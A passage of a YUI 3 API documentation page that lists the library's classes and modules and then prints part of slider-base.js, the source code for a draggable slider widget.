href="..&#x2F;classes/Test.Reporter.html">Test.Reporter</a></li> <li><a href="..&#x2F;classes/Test.Results.html">Test.Results</a></li> <li><a href="..&#x2F;classes/Test.Runner.html">Test.Runner</a></li> <li><a href="..&#x2F;classes/Test.ShouldError.html">Test.ShouldError</a></li> <li><a href="..&#x2F;classes/Test.ShouldFail.html">Test.ShouldFail</a></li> <li><a href="..&#x2F;classes/Test.TestCase.html">Test.TestCase</a></li> <li><a href="..&#x2F;classes/Test.TestFormat.html">Test.TestFormat</a></li> <li><a href="..&#x2F;classes/Test.TestNode.html">Test.TestNode</a></li> <li><a href="..&#x2F;classes/Test.TestRunner.html">Test.TestRunner</a></li> <li><a href="..&#x2F;classes/Test.TestSuite.html">Test.TestSuite</a></li> <li><a href="..&#x2F;classes/Test.UnexpectedError.html">Test.UnexpectedError</a></li> <li><a href="..&#x2F;classes/Test.UnexpectedValue.html">Test.UnexpectedValue</a></li> <li><a href="..&#x2F;classes/Test.Wait.html">Test.Wait</a></li> <li><a href="..&#x2F;classes/Text.AccentFold.html">Text.AccentFold</a></li> <li><a href="..&#x2F;classes/Text.WordBreak.html">Text.WordBreak</a></li> <li><a href="..&#x2F;classes/TimeAxis.html">TimeAxis</a></li> <li><a href="..&#x2F;classes/ToggleButton.html">ToggleButton</a></li> <li><a href="..&#x2F;classes/TopAxisLayout.html">TopAxisLayout</a></li> <li><a href="..&#x2F;classes/Transition.html">Transition</a></li> <li><a href="..&#x2F;classes/UA.html">UA</a></li> <li><a href="..&#x2F;classes/Uploader.html">Uploader</a></li> <li><a href="..&#x2F;classes/Uploader.Queue.html">Uploader.Queue</a></li> <li><a href="..&#x2F;classes/UploaderFlash.html">UploaderFlash</a></li> <li><a href="..&#x2F;classes/UploaderHTML5.html">UploaderHTML5</a></li> <li><a href="..&#x2F;classes/ValueChange.html">ValueChange</a></li> <li><a href="..&#x2F;classes/VerticalLegendLayout.html">VerticalLegendLayout</a></li> <li><a href="..&#x2F;classes/View.html">View</a></li> <li><a href="..&#x2F;classes/View.NodeMap.html">View.NodeMap</a></li> <li><a href="..&#x2F;classes/VMLCircle.html">VMLCircle</a></li> <li><a href="..&#x2F;classes/VMLDrawing.html">VMLDrawing</a></li> <li><a href="..&#x2F;classes/VMLEllipse.html">VMLEllipse</a></li> <li><a href="..&#x2F;classes/VMLGraphic.html">VMLGraphic</a></li> <li><a href="..&#x2F;classes/VMLPath.html">VMLPath</a></li> <li><a href="..&#x2F;classes/VMLPieSlice.html">VMLPieSlice</a></li> <li><a href="..&#x2F;classes/VMLRect.html">VMLRect</a></li> <li><a href="..&#x2F;classes/VMLShape.html">VMLShape</a></li> <li><a href="..&#x2F;classes/Widget.html">Widget</a></li> <li><a href="..&#x2F;classes/WidgetAutohide.html">WidgetAutohide</a></li> <li><a href="..&#x2F;classes/WidgetButtons.html">WidgetButtons</a></li> <li><a href="..&#x2F;classes/WidgetChild.html">WidgetChild</a></li> <li><a href="..&#x2F;classes/WidgetModality.html">WidgetModality</a></li> <li><a href="..&#x2F;classes/WidgetParent.html">WidgetParent</a></li> <li><a href="..&#x2F;classes/WidgetPosition.html">WidgetPosition</a></li> <li><a href="..&#x2F;classes/WidgetPositionAlign.html">WidgetPositionAlign</a></li> <li><a href="..&#x2F;classes/WidgetPositionConstrain.html">WidgetPositionConstrain</a></li> <li><a href="..&#x2F;classes/WidgetStack.html">WidgetStack</a></li> <li><a href="..&#x2F;classes/WidgetStdMod.html">WidgetStdMod</a></li> <li><a href="..&#x2F;classes/XML.html">XML</a></li> <li><a href="..&#x2F;classes/YQL.html">YQL</a></li> <li><a href="..&#x2F;classes/YQLRequest.html">YQLRequest</a></li> <li><a href="..&#x2F;classes/YUI.html">YUI</a></li> <li><a href="..&#x2F;classes/YUI~substitute.html">YUI~substitute</a></li> </ul> <ul id="api-modules" class="apis modules"> <li><a href="..&#x2F;modules/align-plugin.html">align-plugin</a></li> <li><a href="..&#x2F;modules/anim.html">anim</a></li> <li><a href="..&#x2F;modules/anim-base.html">anim-base</a></li> <li><a href="..&#x2F;modules/anim-color.html">anim-color</a></li> <li><a href="..&#x2F;modules/anim-curve.html">anim-curve</a></li> <li><a href="..&#x2F;modules/anim-easing.html">anim-easing</a></li> <li><a href="..&#x2F;modules/anim-node-plugin.html">anim-node-plugin</a></li> <li><a href="..&#x2F;modules/anim-scroll.html">anim-scroll</a></li> <li><a href="..&#x2F;modules/anim-shape.html">anim-shape</a></li> <li><a href="..&#x2F;modules/anim-shape-transform.html">anim-shape-transform</a></li> <li><a href="..&#x2F;modules/anim-xy.html">anim-xy</a></li> <li><a href="..&#x2F;modules/app.html">app</a></li> <li><a href="..&#x2F;modules/app-base.html">app-base</a></li> <li><a href="..&#x2F;modules/app-content.html">app-content</a></li> <li><a href="..&#x2F;modules/app-transitions.html">app-transitions</a></li> <li><a href="..&#x2F;modules/app-transitions-native.html">app-transitions-native</a></li> <li><a href="..&#x2F;modules/array-extras.html">array-extras</a></li> <li><a href="..&#x2F;modules/array-invoke.html">array-invoke</a></li> <li><a href="..&#x2F;modules/arraylist.html">arraylist</a></li> <li><a href="..&#x2F;modules/arraylist-add.html">arraylist-add</a></li> <li><a href="..&#x2F;modules/arraylist-filter.html">arraylist-filter</a></li> <li><a href="..&#x2F;modules/arraysort.html">arraysort</a></li> <li><a href="..&#x2F;modules/async-queue.html">async-queue</a></li> <li><a href="..&#x2F;modules/attribute.html">attribute</a></li> <li><a href="..&#x2F;modules/attribute-base.html">attribute-base</a></li> <li><a href="..&#x2F;modules/attribute-complex.html">attribute-complex</a></li> <li><a href="..&#x2F;modules/attribute-core.html">attribute-core</a></li> <li><a href="..&#x2F;modules/attribute-events.html">attribute-events</a></li> <li><a href="..&#x2F;modules/attribute-extras.html">attribute-extras</a></li> <li><a href="..&#x2F;modules/autocomplete.html">autocomplete</a></li> <li><a href="..&#x2F;modules/autocomplete-base.html">autocomplete-base</a></li> <li><a href="..&#x2F;modules/autocomplete-filters.html">autocomplete-filters</a></li> <li><a href="..&#x2F;modules/autocomplete-filters-accentfold.html">autocomplete-filters-accentfold</a></li> <li><a href="..&#x2F;modules/autocomplete-highlighters.html">autocomplete-highlighters</a></li> <li><a href="..&#x2F;modules/autocomplete-highlighters-accentfold.html">autocomplete-highlighters-accentfold</a></li> <li><a href="..&#x2F;modules/autocomplete-list.html">autocomplete-list</a></li> <li><a href="..&#x2F;modules/autocomplete-list-keys.html">autocomplete-list-keys</a></li> <li><a href="..&#x2F;modules/autocomplete-plugin.html">autocomplete-plugin</a></li> <li><a href="..&#x2F;modules/autocomplete-sources.html">autocomplete-sources</a></li> <li><a href="..&#x2F;modules/base.html">base</a></li> <li><a href="..&#x2F;modules/base-base.html">base-base</a></li> <li><a href="..&#x2F;modules/base-build.html">base-build</a></li> <li><a href="..&#x2F;modules/base-core.html">base-core</a></li> <li><a href="..&#x2F;modules/base-pluginhost.html">base-pluginhost</a></li> <li><a href="..&#x2F;modules/button.html">button</a></li> <li><a href="..&#x2F;modules/button-core.html">button-core</a></li> <li><a href="..&#x2F;modules/button-group.html">button-group</a></li> <li><a href="..&#x2F;modules/button-plugin.html">button-plugin</a></li> <li><a href="..&#x2F;modules/cache.html">cache</a></li> <li><a href="..&#x2F;modules/cache-base.html">cache-base</a></li> <li><a href="..&#x2F;modules/cache-offline.html">cache-offline</a></li> <li><a href="..&#x2F;modules/cache-plugin.html">cache-plugin</a></li> <li><a href="..&#x2F;modules/calendar.html">calendar</a></li> <li><a href="..&#x2F;modules/calendar-base.html">calendar-base</a></li> <li><a href="..&#x2F;modules/calendarnavigator.html">calendarnavigator</a></li> <li><a href="..&#x2F;modules/charts.html">charts</a></li> <li><a href="..&#x2F;modules/charts-base.html">charts-base</a></li> <li><a href="..&#x2F;modules/charts-legend.html">charts-legend</a></li> <li><a href="..&#x2F;modules/classnamemanager.html">classnamemanager</a></li> <li><a href="..&#x2F;modules/clickable-rail.html">clickable-rail</a></li> <li><a href="..&#x2F;modules/collection.html">collection</a></li> <li><a href="..&#x2F;modules/console.html">console</a></li> <li><a href="..&#x2F;modules/console-filters.html">console-filters</a></li> <li><a href="..&#x2F;modules/cookie.html">cookie</a></li> <li><a href="..&#x2F;modules/createlink-base.html">createlink-base</a></li> <li><a href="..&#x2F;modules/dataschema.html">dataschema</a></li> <li><a href="..&#x2F;modules/dataschema-array.html">dataschema-array</a></li> <li><a href="..&#x2F;modules/dataschema-base.html">dataschema-base</a></li> <li><a href="..&#x2F;modules/dataschema-json.html">dataschema-json</a></li> <li><a href="..&#x2F;modules/dataschema-text.html">dataschema-text</a></li> <li><a href="..&#x2F;modules/dataschema-xml.html">dataschema-xml</a></li> <li><a href="..&#x2F;modules/datasource.html">datasource</a></li> <li><a href="..&#x2F;modules/datasource-arrayschema.html">datasource-arrayschema</a></li> <li><a href="..&#x2F;modules/datasource-cache.html">datasource-cache</a></li> <li><a href="..&#x2F;modules/datasource-function.html">datasource-function</a></li> <li><a href="..&#x2F;modules/datasource-get.html">datasource-get</a></li> <li><a href="..&#x2F;modules/datasource-io.html">datasource-io</a></li> <li><a href="..&#x2F;modules/datasource-jsonschema.html">datasource-jsonschema</a></li> <li><a href="..&#x2F;modules/datasource-local.html">datasource-local</a></li> <li><a href="..&#x2F;modules/datasource-polling.html">datasource-polling</a></li> <li><a href="..&#x2F;modules/datasource-textschema.html">datasource-textschema</a></li> <li><a href="..&#x2F;modules/datasource-xmlschema.html">datasource-xmlschema</a></li> <li><a href="..&#x2F;modules/datatable.html">datatable</a></li> <li><a href="..&#x2F;modules/datatable-base.html">datatable-base</a></li> <li><a href="..&#x2F;modules/datatable-base-deprecated.html">datatable-base-deprecated</a></li> <li><a href="..&#x2F;modules/datatable-body.html">datatable-body</a></li> <li><a href="..&#x2F;modules/datatable-column-widths.html">datatable-column-widths</a></li> <li><a href="..&#x2F;modules/datatable-core.html">datatable-core</a></li> <li><a href="..&#x2F;modules/datatable-datasource.html">datatable-datasource</a></li> <li><a href="..&#x2F;modules/datatable-datasource-deprecated.html">datatable-datasource-deprecated</a></li> <li><a href="..&#x2F;modules/datatable-deprecated.html">datatable-deprecated</a></li> <li><a href="..&#x2F;modules/datatable-head.html">datatable-head</a></li> <li><a href="..&#x2F;modules/datatable-message.html">datatable-message</a></li> <li><a href="..&#x2F;modules/datatable-mutable.html">datatable-mutable</a></li> <li><a href="..&#x2F;modules/datatable-scroll.html">datatable-scroll</a></li> <li><a href="..&#x2F;modules/datatable-scroll-deprecated.html">datatable-scroll-deprecated</a></li> <li><a href="..&#x2F;modules/datatable-sort.html">datatable-sort</a></li> <li><a href="..&#x2F;modules/datatable-sort-deprecated.html">datatable-sort-deprecated</a></li> <li><a href="..&#x2F;modules/datatable-table.html">datatable-table</a></li> <li><a href="..&#x2F;modules/datatype.html">datatype</a></li> <li><a href="..&#x2F;modules/datatype-date.html">datatype-date</a></li> <li><a href="..&#x2F;modules/datatype-date-format.html">datatype-date-format</a></li> <li><a href="..&#x2F;modules/datatype-date-math.html">datatype-date-math</a></li> <li><a href="..&#x2F;modules/datatype-date-parse.html">datatype-date-parse</a></li> <li><a href="..&#x2F;modules/datatype-number.html">datatype-number</a></li> <li><a href="..&#x2F;modules/datatype-number-format.html">datatype-number-format</a></li> <li><a href="..&#x2F;modules/datatype-number-parse.html">datatype-number-parse</a></li> <li><a href="..&#x2F;modules/datatype-xml.html">datatype-xml</a></li> <li><a href="..&#x2F;modules/datatype-xml-format.html">datatype-xml-format</a></li> <li><a href="..&#x2F;modules/datatype-xml-parse.html">datatype-xml-parse</a></li> <li><a href="..&#x2F;modules/dd.html">dd</a></li> <li><a href="..&#x2F;modules/dd-constrain.html">dd-constrain</a></li> <li><a href="..&#x2F;modules/dd-ddm.html">dd-ddm</a></li> <li><a href="..&#x2F;modules/dd-ddm-base.html">dd-ddm-base</a></li> <li><a href="..&#x2F;modules/dd-ddm-drop.html">dd-ddm-drop</a></li> <li><a href="..&#x2F;modules/dd-delegate.html">dd-delegate</a></li> <li><a href="..&#x2F;modules/dd-drag.html">dd-drag</a></li> <li><a href="..&#x2F;modules/dd-drop.html">dd-drop</a></li> <li><a href="..&#x2F;modules/dd-drop-plugin.html">dd-drop-plugin</a></li> <li><a href="..&#x2F;modules/dd-gestures.html">dd-gestures</a></li> <li><a href="..&#x2F;modules/dd-plugin.html">dd-plugin</a></li> <li><a href="..&#x2F;modules/dd-proxy.html">dd-proxy</a></li> <li><a href="..&#x2F;modules/dd-scroll.html">dd-scroll</a></li> <li><a href="..&#x2F;modules/dial.html">dial</a></li> <li><a href="..&#x2F;modules/dom.html">dom</a></li> <li><a href="..&#x2F;modules/dom-base.html">dom-base</a></li> <li><a href="..&#x2F;modules/dom-screen.html">dom-screen</a></li> <li><a href="..&#x2F;modules/dom-style.html">dom-style</a></li> <li><a href="..&#x2F;modules/dump.html">dump</a></li> <li><a href="..&#x2F;modules/editor.html">editor</a></li> <li><a href="..&#x2F;modules/editor-base.html">editor-base</a></li> <li><a href="..&#x2F;modules/editor-bidi.html">editor-bidi</a></li> <li><a href="..&#x2F;modules/editor-br.html">editor-br</a></li> <li><a href="..&#x2F;modules/editor-lists.html">editor-lists</a></li> <li><a href="..&#x2F;modules/editor-para.html">editor-para</a></li> <li><a href="..&#x2F;modules/editor-para-base.html">editor-para-base</a></li> <li><a href="..&#x2F;modules/editor-para-ie.html">editor-para-ie</a></li> <li><a href="..&#x2F;modules/editor-tab.html">editor-tab</a></li> <li><a href="..&#x2F;modules/escape.html">escape</a></li> <li><a href="..&#x2F;modules/event.html">event</a></li> <li><a href="..&#x2F;modules/event-base.html">event-base</a></li> <li><a href="..&#x2F;modules/event-contextmenu.html">event-contextmenu</a></li> <li><a href="..&#x2F;modules/event-custom.html">event-custom</a></li> <li><a href="..&#x2F;modules/event-custom-base.html">event-custom-base</a></li> <li><a href="..&#x2F;modules/event-custom-complex.html">event-custom-complex</a></li> <li><a href="..&#x2F;modules/event-delegate.html">event-delegate</a></li> <li><a href="..&#x2F;modules/event-flick.html">event-flick</a></li> <li><a href="..&#x2F;modules/event-focus.html">event-focus</a></li> <li><a href="..&#x2F;modules/event-gestures.html">event-gestures</a></li> <li><a href="..&#x2F;modules/event-hover.html">event-hover</a></li> <li><a href="..&#x2F;modules/event-key.html">event-key</a></li> <li><a href="..&#x2F;modules/event-mouseenter.html">event-mouseenter</a></li> <li><a href="..&#x2F;modules/event-mousewheel.html">event-mousewheel</a></li> <li><a href="..&#x2F;modules/event-move.html">event-move</a></li> <li><a href="..&#x2F;modules/event-outside.html">event-outside</a></li> <li><a href="..&#x2F;modules/event-resize.html">event-resize</a></li> <li><a href="..&#x2F;modules/event-simulate.html">event-simulate</a></li> <li><a href="..&#x2F;modules/event-synthetic.html">event-synthetic</a></li> <li><a href="..&#x2F;modules/event-tap.html">event-tap</a></li> <li><a href="..&#x2F;modules/event-touch.html">event-touch</a></li> <li><a href="..&#x2F;modules/event-valuechange.html">event-valuechange</a></li> <li><a href="..&#x2F;modules/exec-command.html">exec-command</a></li> <li><a href="..&#x2F;modules/features.html">features</a></li> <li><a href="..&#x2F;modules/file.html">file</a></li> <li><a href="..&#x2F;modules/file-flash.html">file-flash</a></li> <li><a href="..&#x2F;modules/file-html5.html">file-html5</a></li> <li><a href="..&#x2F;modules/frame.html">frame</a></li> <li><a href="..&#x2F;modules/gesture-simulate.html">gesture-simulate</a></li> <li><a href="..&#x2F;modules/get.html">get</a></li> <li><a href="..&#x2F;modules/get-nodejs.html">get-nodejs</a></li> <li><a href="..&#x2F;modules/graphics.html">graphics</a></li> <li><a href="..&#x2F;modules/handlebars.html">handlebars</a></li> <li><a href="..&#x2F;modules/handlebars-base.html">handlebars-base</a></li> <li><a href="..&#x2F;modules/handlebars-compiler.html">handlebars-compiler</a></li> <li><a href="..&#x2F;modules/highlight.html">highlight</a></li> <li><a href="..&#x2F;modules/highlight-accentfold.html">highlight-accentfold</a></li> <li><a href="..&#x2F;modules/highlight-base.html">highlight-base</a></li> <li><a href="..&#x2F;modules/history.html">history</a></li> <li><a href="..&#x2F;modules/history-base.html">history-base</a></li> <li><a href="..&#x2F;modules/history-hash.html">history-hash</a></li> <li><a href="..&#x2F;modules/history-hash-ie.html">history-hash-ie</a></li> <li><a href="..&#x2F;modules/history-html5.html">history-html5</a></li> <li><a href="..&#x2F;modules/imageloader.html">imageloader</a></li> <li><a href="..&#x2F;modules/intl.html">intl</a></li> <li><a href="..&#x2F;modules/io.html">io</a></li> <li><a href="..&#x2F;modules/io-base.html">io-base</a></li> <li><a href="..&#x2F;modules/io-form.html">io-form</a></li> <li><a href="..&#x2F;modules/io-nodejs.html">io-nodejs</a></li> <li><a href="..&#x2F;modules/io-queue.html">io-queue</a></li> <li><a href="..&#x2F;modules/io-upload-iframe.html">io-upload-iframe</a></li> <li><a href="..&#x2F;modules/io-xdr.html">io-xdr</a></li> <li><a href="..&#x2F;modules/json.html">json</a></li> <li><a href="..&#x2F;modules/json-parse.html">json-parse</a></li> <li><a href="..&#x2F;modules/json-stringify.html">json-stringify</a></li> <li><a href="..&#x2F;modules/jsonp.html">jsonp</a></li> <li><a href="..&#x2F;modules/jsonp-url.html">jsonp-url</a></li> <li><a href="..&#x2F;modules/lazy-model-list.html">lazy-model-list</a></li> <li><a href="..&#x2F;modules/loader.html">loader</a></li> <li><a href="..&#x2F;modules/loader-base.html">loader-base</a></li> <li><a href="..&#x2F;modules/matrix.html">matrix</a></li> <li><a href="..&#x2F;modules/model.html">model</a></li> <li><a href="..&#x2F;modules/model-list.html">model-list</a></li> <li><a href="..&#x2F;modules/model-sync-rest.html">model-sync-rest</a></li> <li><a href="..&#x2F;modules/node.html">node</a></li> <li><a href="..&#x2F;modules/node-base.html">node-base</a></li> <li><a href="..&#x2F;modules/node-core.html">node-core</a></li> <li><a href="..&#x2F;modules/node-data.html">node-data</a></li> <li><a href="..&#x2F;modules/node-deprecated.html">node-deprecated</a></li> <li><a href="..&#x2F;modules/node-event-delegate.html">node-event-delegate</a></li> <li><a href="..&#x2F;modules/node-event-html5.html">node-event-html5</a></li> <li><a href="..&#x2F;modules/node-event-simulate.html">node-event-simulate</a></li> <li><a href="..&#x2F;modules/node-flick.html">node-flick</a></li> <li><a href="..&#x2F;modules/node-focusmanager.html">node-focusmanager</a></li> <li><a href="..&#x2F;modules/node-load.html">node-load</a></li> <li><a href="..&#x2F;modules/node-menunav.html">node-menunav</a></li> <li><a href="..&#x2F;modules/node-pluginhost.html">node-pluginhost</a></li> <li><a href="..&#x2F;modules/node-screen.html">node-screen</a></li> <li><a href="..&#x2F;modules/node-scroll-info.html">node-scroll-info</a></li> <li><a href="..&#x2F;modules/node-style.html">node-style</a></li> <li><a href="..&#x2F;modules/oop.html">oop</a></li> <li><a href="..&#x2F;modules/overlay.html">overlay</a></li> <li><a href="..&#x2F;modules/panel.html">panel</a></li> <li><a href="..&#x2F;modules/parallel.html">parallel</a></li> <li><a href="..&#x2F;modules/pjax.html">pjax</a></li> <li><a href="..&#x2F;modules/pjax-base.html">pjax-base</a></li> <li><a href="..&#x2F;modules/pjax-content.html">pjax-content</a></li> <li><a href="..&#x2F;modules/pjax-plugin.html">pjax-plugin</a></li> <li><a href="..&#x2F;modules/plugin.html">plugin</a></li> <li><a href="..&#x2F;modules/pluginhost.html">pluginhost</a></li> <li><a href="..&#x2F;modules/pluginhost-base.html">pluginhost-base</a></li> <li><a href="..&#x2F;modules/pluginhost-config.html">pluginhost-config</a></li> <li><a href="..&#x2F;modules/profiler.html">profiler</a></li> <li><a href="..&#x2F;modules/querystring.html">querystring</a></li> <li><a href="..&#x2F;modules/querystring-parse.html">querystring-parse</a></li> <li><a href="..&#x2F;modules/querystring-parse-simple.html">querystring-parse-simple</a></li> <li><a href="..&#x2F;modules/querystring-stringify.html">querystring-stringify</a></li> <li><a href="..&#x2F;modules/querystring-stringify-simple.html">querystring-stringify-simple</a></li> <li><a href="..&#x2F;modules/queue-promote.html">queue-promote</a></li> <li><a href="..&#x2F;modules/range-slider.html">range-slider</a></li> <li><a href="..&#x2F;modules/recordset.html">recordset</a></li> <li><a href="..&#x2F;modules/recordset-base.html">recordset-base</a></li> <li><a href="..&#x2F;modules/recordset-filter.html">recordset-filter</a></li> <li><a href="..&#x2F;modules/recordset-indexer.html">recordset-indexer</a></li> <li><a href="..&#x2F;modules/recordset-sort.html">recordset-sort</a></li> <li><a href="..&#x2F;modules/resize.html">resize</a></li> <li><a href="..&#x2F;modules/resize-contrain.html">resize-contrain</a></li> <li><a href="..&#x2F;modules/resize-plugin.html">resize-plugin</a></li> <li><a href="..&#x2F;modules/resize-proxy.html">resize-proxy</a></li> <li><a href="..&#x2F;modules/rollup.html">rollup</a></li> <li><a href="..&#x2F;modules/router.html">router</a></li> <li><a href="..&#x2F;modules/scrollview.html">scrollview</a></li> <li><a href="..&#x2F;modules/scrollview-base.html">scrollview-base</a></li> <li><a href="..&#x2F;modules/scrollview-base-ie.html">scrollview-base-ie</a></li> <li><a href="..&#x2F;modules/scrollview-list.html">scrollview-list</a></li> <li><a href="..&#x2F;modules/scrollview-paginator.html">scrollview-paginator</a></li> <li><a href="..&#x2F;modules/scrollview-scrollbars.html">scrollview-scrollbars</a></li> <li><a href="..&#x2F;modules/selection.html">selection</a></li> <li><a href="..&#x2F;modules/selector-css2.html">selector-css2</a></li> <li><a href="..&#x2F;modules/selector-css3.html">selector-css3</a></li> <li><a href="..&#x2F;modules/selector-native.html">selector-native</a></li> <li><a href="..&#x2F;modules/shim-plugin.html">shim-plugin</a></li> <li><a href="..&#x2F;modules/slider.html">slider</a></li> <li><a href="..&#x2F;modules/slider-base.html">slider-base</a></li> <li><a href="..&#x2F;modules/slider-value-range.html">slider-value-range</a></li> <li><a href="..&#x2F;modules/sortable.html">sortable</a></li> <li><a href="..&#x2F;modules/sortable-scroll.html">sortable-scroll</a></li> <li><a href="..&#x2F;modules/stylesheet.html">stylesheet</a></li> <li><a href="..&#x2F;modules/substitute.html">substitute</a></li> <li><a href="..&#x2F;modules/swf.html">swf</a></li> <li><a href="..&#x2F;modules/swfdetect.html">swfdetect</a></li> <li><a href="..&#x2F;modules/tabview.html">tabview</a></li> <li><a href="..&#x2F;modules/test.html">test</a></li> <li><a href="..&#x2F;modules/test-console.html">test-console</a></li> <li><a href="..&#x2F;modules/text.html">text</a></li> <li><a href="..&#x2F;modules/text-accentfold.html">text-accentfold</a></li> <li><a href="..&#x2F;modules/text-wordbreak.html">text-wordbreak</a></li> <li><a href="..&#x2F;modules/transition.html">transition</a></li> <li><a href="..&#x2F;modules/transition-timer.html">transition-timer</a></li> <li><a href="..&#x2F;modules/uploader.html">uploader</a></li> <li><a href="..&#x2F;modules/uploader-deprecated.html">uploader-deprecated</a></li> <li><a href="..&#x2F;modules/uploader-flash.html">uploader-flash</a></li> <li><a href="..&#x2F;modules/uploader-html5.html">uploader-html5</a></li> <li><a href="..&#x2F;modules/uploader-queue.html">uploader-queue</a></li> <li><a href="..&#x2F;modules/view.html">view</a></li> <li><a href="..&#x2F;modules/view-node-map.html">view-node-map</a></li> <li><a href="..&#x2F;modules/widget.html">widget</a></li> <li><a href="..&#x2F;modules/widget-anim.html">widget-anim</a></li> <li><a href="..&#x2F;modules/widget-autohide.html">widget-autohide</a></li> <li><a href="..&#x2F;modules/widget-base.html">widget-base</a></li> <li><a href="..&#x2F;modules/widget-base-ie.html">widget-base-ie</a></li> <li><a href="..&#x2F;modules/widget-buttons.html">widget-buttons</a></li> <li><a href="..&#x2F;modules/widget-child.html">widget-child</a></li> <li><a href="..&#x2F;modules/widget-htmlparser.html">widget-htmlparser</a></li> <li><a href="..&#x2F;modules/widget-locale.html">widget-locale</a></li> <li><a href="..&#x2F;modules/widget-modality.html">widget-modality</a></li> <li><a href="..&#x2F;modules/widget-parent.html">widget-parent</a></li> <li><a href="..&#x2F;modules/widget-position.html">widget-position</a></li> <li><a href="..&#x2F;modules/widget-position-align.html">widget-position-align</a></li> <li><a href="..&#x2F;modules/widget-position-constrain.html">widget-position-constrain</a></li> <li><a href="..&#x2F;modules/widget-skin.html">widget-skin</a></li> <li><a href="..&#x2F;modules/widget-stack.html">widget-stack</a></li> <li><a href="..&#x2F;modules/widget-stdmod.html">widget-stdmod</a></li> <li><a href="..&#x2F;modules/widget-uievents.html">widget-uievents</a></li> <li><a href="..&#x2F;modules/yql.html">yql</a></li> <li><a href="..&#x2F;modules/yql-nodejs.html">yql-nodejs</a></li> <li><a href="..&#x2F;modules/yql-winjs.html">yql-winjs</a></li> <li><a href="..&#x2F;modules/yui.html">yui</a></li> <li><a href="..&#x2F;modules/yui-base.html">yui-base</a></li> <li><a href="..&#x2F;modules/yui-later.html">yui-later</a></li> <li><a href="..&#x2F;modules/yui-log.html">yui-log</a></li> <li><a href="..&#x2F;modules/yui-throttle.html">yui-throttle</a></li> <li><a href="..&#x2F;modules/yui3.html">yui3</a></li> </ul> </div> </div> </div> </div> </div> <div class="yui3-u-3-4"> <div id="api-options"> Show: <label for="api-show-inherited"> <input type="checkbox" id="api-show-inherited" checked> Inherited </label> <label for="api-show-protected"> <input type="checkbox" id="api-show-protected"> Protected </label> <label for="api-show-private"> <input type="checkbox" id="api-show-private"> Private </label> <label for="api-show-deprecated"> <input type="checkbox" id="api-show-deprecated"> Deprecated </label> </div> <div class="apidocs"> <div id="docs-main"> <div class="content"> <h1 class="file-heading">File: slider&#x2F;js&#x2F;slider-base.js</h1> <div class="file"> <pre class="code prettyprint linenums"> &#x2F;** * Create a sliding value range input visualized as a draggable thumb on a * background element. * * @module slider * @submodule slider-base *&#x2F; var INVALID_VALUE = Y.Attribute.INVALID_VALUE; &#x2F;** * Create a slider to represent an input control capable of representing a * series of intermediate states based on the position of the slider&#x27;s thumb. * These states are typically aligned to a value algorithm whereby the thumb * position corresponds to a given value. Sliders may be oriented vertically or * horizontally, based on the &lt;code&gt;axis&lt;&#x2F;code&gt; configuration. * * @class SliderBase * @extends Widget * @param config {Object} Configuration object * @constructor *&#x2F; function SliderBase() { SliderBase.superclass.constructor.apply( this, arguments ); } Y.SliderBase = Y.extend( SliderBase, Y.Widget, { &#x2F;&#x2F; Y.Slider prototype &#x2F;** * Construction logic executed during Slider instantiation. * * @method initializer * @protected *&#x2F; initializer : function () { &#x2F;** * The configured axis, stored for fast lookup since it&#x27;s a writeOnce * attribute. This is for use by extension classes. For * implementation code, use &lt;code&gt;get( &amp;quot;axis&amp;quot; )&lt;&#x2F;code&gt; for * authoritative source. Never write to this property. * * @property axis * @type {String} * @protected *&#x2F; this.axis = this.get( &#x27;axis&#x27; ); &#x2F;** * Cached fast access map for DOM properties and attributes that * pertain to accessing dimensional or positioning information * according to the Slider&#x27;s axis (e.g. &amp;quot;height&amp;quot; vs. * &amp;quot;width&amp;quot;). Extension classes should add to this collection * for axis related strings if necessary. * * @property _key * @type {Object} * @protected *&#x2F; this._key = { dim : ( this.axis === &#x27;y&#x27; ) ? &#x27;height&#x27; : &#x27;width&#x27;, minEdge: ( this.axis === &#x27;y&#x27; ) ? &#x27;top&#x27; : &#x27;left&#x27;, maxEdge: ( this.axis === &#x27;y&#x27; ) ? &#x27;bottom&#x27; : &#x27;right&#x27;, xyIndex: ( this.axis === &#x27;y&#x27; ) ? 1 : 0 }; &#x2F;** * Signals that the thumb has moved. Payload includes the thumb&#x27;s * pixel offset from the top&#x2F;left edge of the rail, and if triggered by * dragging the thumb, the &lt;code&gt;drag:drag&lt;&#x2F;code&gt; event. * * @event thumbMove * @param event {Event} The event object for the thumbMove with the * following extra properties: * &lt;dl&gt; * &lt;dt&gt;offset&lt;&#x2F;dt&gt; * &lt;dd&gt;Pixel offset from top&#x2F;left of the slider to the new * thumb position&lt;&#x2F;dd&gt; * &lt;dt&gt;ddEvent (deprecated)&lt;&#x2F;dt&gt; * &lt;dd&gt;&lt;code&gt;drag:drag&lt;&#x2F;code&gt; event from the thumb&lt;&#x2F;dd&gt; * &lt;dt&gt;originEvent&lt;&#x2F;dt&gt; * &lt;dd&gt;&lt;code&gt;drag:drag&lt;&#x2F;code&gt; event from the thumb&lt;&#x2F;dd&gt; * &lt;&#x2F;dl&gt; *&#x2F; this.publish( &#x27;thumbMove&#x27;, { defaultFn: this._defThumbMoveFn, queuable : true } ); }, &#x2F;** * Create the DOM structure for the Slider. * * @method renderUI * @protected *&#x2F; renderUI : function () { var contentBox = this.get( &#x27;contentBox&#x27; ); &#x2F;** * The Node instance of the Slider&#x27;s rail element. Do not write to * this property. * * @property rail * @type {Node} *&#x2F; this.rail = this.renderRail(); this._uiSetRailLength( this.get( &#x27;length&#x27; ) ); &#x2F;** * The Node instance of the Slider&#x27;s thumb element. Do not write to * this property. * * @property thumb * @type {Node} *&#x2F; this.thumb = this.renderThumb(); this.rail.appendChild( this.thumb ); &#x2F;&#x2F; @TODO: insert( contentBox, &#x27;replace&#x27; ) or setHTML? contentBox.appendChild( this.rail ); &#x2F;&#x2F; &lt;span class=&quot;yui3-slider-x&quot;&gt; contentBox.addClass( this.getClassName( this.axis ) ); }, &#x2F;** * Creates the Slider rail DOM subtree for insertion into the Slider&#x27;s * &lt;code&gt;contentBox&lt;&#x2F;code&gt;. Override this method if you want to provide * the rail element (presumably from existing markup). * * @method renderRail * @return {Node} the rail node subtree *&#x2F; renderRail: function () { var minCapClass = this.getClassName( &#x27;rail&#x27;, &#x27;cap&#x27;, this._key.minEdge ), maxCapClass = this.getClassName( &#x27;rail&#x27;, &#x27;cap&#x27;, this._key.maxEdge ); return Y.Node.create( Y.Lang.sub( this.RAIL_TEMPLATE, { railClass : this.getClassName( &#x27;rail&#x27; ), railMinCapClass: minCapClass, railMaxCapClass: maxCapClass } ) ); }, &#x2F;** * 